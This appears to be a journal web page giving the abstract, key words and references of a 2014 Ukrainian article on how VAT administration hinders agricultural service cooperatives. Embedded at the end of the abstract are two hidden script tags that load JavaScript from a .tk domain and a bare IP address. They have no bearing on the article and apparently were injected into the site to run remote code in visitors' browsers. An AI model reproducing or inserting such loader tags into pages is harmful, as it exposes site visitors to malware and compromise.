ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 336.2:631.162
Фінансові відносини та бухгалтерський облік

Tax stimulation of the development of agricultural service cooperation / // Ekonomika APK. - 2014. - № 5 - P. 37

The article deals with current problems in the functioning of the tax mechanism that hinder the development of agricultural service cooperatives and lead to substantial losses of income of farms and budgets of different levels. Analysis of the key shortcomings of the current mechanism for collecting value added tax that destructive influence on the development of the cooperative movement in the country is represented. Propositions of eliminating the drawbacks of the mechanism of administration of VAT which will provide the alignment of business conditions for agricultural enterprises and agricultural service cooperatives were proposed. Figs.: 2. Refs.: 27.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: tax regulation, the tax mechanism, farms, agricultural service cooperatives, value-added tax, tax privileges

References

 1. Вернигора М. Сільськогосподарська обслуговуюча кооперація потребує сприятливого оподаткування [Електронний ресурс] / М. Вернигора // Newsper.net, Національний прес-клуб «Українська перспектива». – URL: http://lenta.newsper.net/ua/news?id= 236515836&date=2013-10-25.
 2. Гриценко М. Чому в Україні не розвиваються сільськогосподарські кооперативи [Електронний ресурс] / М. Гриценко, М. Вернигора // Galinfo, Національний прес-клуб «Українська перспектива». – URL: http://galinfo.com.ua/news/108592.html.
 3. Дема Д. До питання неприбуткового статусу сільськогосподарських обслуговуючих кооперативів [Електронний ресурс] / Д. Дема, О. Дема // Вісник ЖНАЕУ. – 2012. – №1. – Т. 2. – URL: http://www.znau.edu.ua/visnik/2012_1_2/91.pdf.
 4. Досвід Канади та країн ЄС у сфері політики з підтримки розвитку сільськогосподарських обслуговуючих кооперативів: аналітичне дослідження / [уклад.: С. Курдицький (гол. ред.), В. Бондарчук, Д. Алколей, Л. Молдаван та ін.]. – К., 2011. – 92 с.
 5. Жуков А. Кооперация личных подсобных хозяйств необходима / А. Жуков // АПК: экономика, управление – 2013. – №. 3. – С. 32-36.
 6. Занько Б. Бухгалтерский и налоговый учет комиссионных операций / Б. Занько // Справочник экономиста. – 2012. – №9 (105). – С. 43-58.
 7. Караваєва О. Могутня купка / О. Караваєва // Агрогроші. – 2012. – №2 (5), берез. – С. 28-31.
 8. Костюк І. Селяни не вступатимуть до молочних кооперативів [Електронний ресурс] / І. Костюк // Відомості-UA.com, 2008-2014, 20 грудня 2012 р. (електр. текст). – URL: http://vidomosti-ua.com/newspaper/56649.
 9. Крылов В. Через пилотные проекты к созданию системы сельскохозяйственной кооперации / В. Крылов // АПК: экономика, управление. – 2013. – №. 10. – С. 32-36.
 10. Малік М. Проблемні питання розвитку кооперації та інтеграційних відносин в АПК / М. Малік, Ю. Лузан // Економіка АПК. – 2010. – №3. – С. 5-12.
 11. Новіков Г. Кооперативи допоможуть селянам створити власний конкурентоздатний бізнес [Електронний ресурс] / Г.В. Новіков // Gazeta.ua. – 2013. – 17 квіт. – URL: http://gazeta.ua/articles/economics/_ekspert-kooperativi-dopomozhut-selyanam-stvoriti-vlasnij-konkurentozdatnij-biznes-/493457.
 12. Податковий кодекс України : Закон України від 02.12.2010 р. № 2755-VI // Голос України. – 2010. – 4 груд. – № 229 (№229-230) (зі змінами та доповненнями).
 13. Практичне керівництво з питань обліку і оподаткування у багатофункціональних сільськогосподарських обслуговуючих кооперативах (СОК) : Практ. посіб. // United Nations Development Programme in Ukraine. – К.: UNDP, 2013. – 146 с.
 14. Про затвердження Державної цільової економічної програми підтримки розвитку сільськогосподарських обслуговуючих кооперативів на період до 2015 року : Постанова Кабінету Міністрів України від 03.06.2009 р. № 557 // Уряд. кур’єр. – 2009. – № 103.
 15. Про кооперацію : Закон України від 10.07.2003 р. № 1087-IV // Голос України. – 2003. – №160. (зі змінами та доп.).
 16. Про сільськогосподарську кооперацію : Закон України від 17.07.1997 р. № 469/97-ВР // Голос України. – 1997. – 13 серп. (зі змінами та доп.).
 17. Сава А. Правові засади оподаткування сільськогосподарських обслуговуючих кооперативів [Електронний ресурс] / А. Сава // РЦ наукового забезпечення АПВ, Тернопільська ДСГДС ІКСГП НААН. Матеріали Інтернет конференції 6-7 трав. 2010 року. – URL: http://conftiapv.at.ua/publ/konf_6_7_traven_2010/44_pravovi _zasadi_opodatkuvannja_silskogospodarskikh_obslugovujuchikh_kooperativiv/1-1-0-48.
 18. Серица И. Работа на условиях комиссии: налоговые последствия для комитента и комиссионера / И. Серица // Справочник экономиста. – 2011. – №7 (91). – С. 45-51.
 19. Сільськогосподарська обслуговуюча кооперація : Словник-довідник ; за ред. Р. Корінця, М. Гриценка, М. Маліка. – Львів : НВФ «Українські технології», 2010. – 160 с.
 20. Сільськогосподарський обслуговуючий кооператив: практичний посіб. / [уклад. : В.В. Гончаренко, Ю.П. Воскобійник, В.В. Зіновчук та ін.]; за ред. М.П. Гриценка. – К.: ІАЕ, 2009. – 102 с.
 21. Сільськогосподарські обслуговуючі кооперативи : Методичні рекомендації / Ю. Бережна, О. Крижанівський, О. Левченко, Н. Гижко // Вінницька ОДА, ГУ ПАР, ГО «Подільська СДС». – В.: Вінницька газ., 2009. – 196 с.
 22. Cook M. How Agricultural Cooperatives Are Taxed / M.Cook, C. Ratchford, B.Griffith [Електронний ресурс] / Published by University of Missouri Extension, Department of Agricultural Economics, March 1995. - URL: http://extension.missouri.edu/p/G903.
 23. Cooperative: Financing and Taxation // Сooperative Information Department of Agriculture, the Internal Revenue Service, the U.S. – Report 1, Section 9. – July 1995. – URL: http://www.uwcc.wisc.edu/pdf/coop%20financing%20and%20taxation.pdf.
 24. Frederick D. Іncome tax treatment of cooperatives [Електронний ресурс] / Edition D. Frederick // Cooperative Information, Program LeaderLaw, Policy&Governance/. – Report 44, Part І, April 2005. – URL: http://www.rurdev.usda.gov/rbs/pub/cir441.pdf.
 25. Information for Farmers: State and Local Sales and Use Tax // www.revenue.state.pa.us, Pennsylvania Department of Revenue, REV-1729 AS (11-06), Revised November 2006. - URL: http://www.dmv.state.pa.us/pdotforms/fact_sheets/revenue%20tax%20info%20for%20farmers
 26. Krywan T. Opodatkowanie spółdzielniach zajmujących się produkcją rolną / T. Krywan // ABC a Wolters Kluwer business/. – URL: http://www.podatki.abc.com.pl/czytaj/-/artykul/opodatkowanie-przychodow-z-tytulu-czlonkostwa-w-rolniczych-spoldzielniach-produkcyjnych-oraz-innych-spoldzielniach-zajmujacych-sie-produkcja-rolna.
 27. Sanders B. Сooperative taxation [Електронний ресурс] / B. Sanders, K. Duft // Washington State University & U.S. Department of agriculture cooperating, Research Associate, Department of Agricultural Economics, WSU, Pullman. – URL: http://www.agribusiness-mgmt.wsu.edu/ ExtensionNewsletters/coop/CoopTax.pdf.
Read article: 14_05_37-43.pdf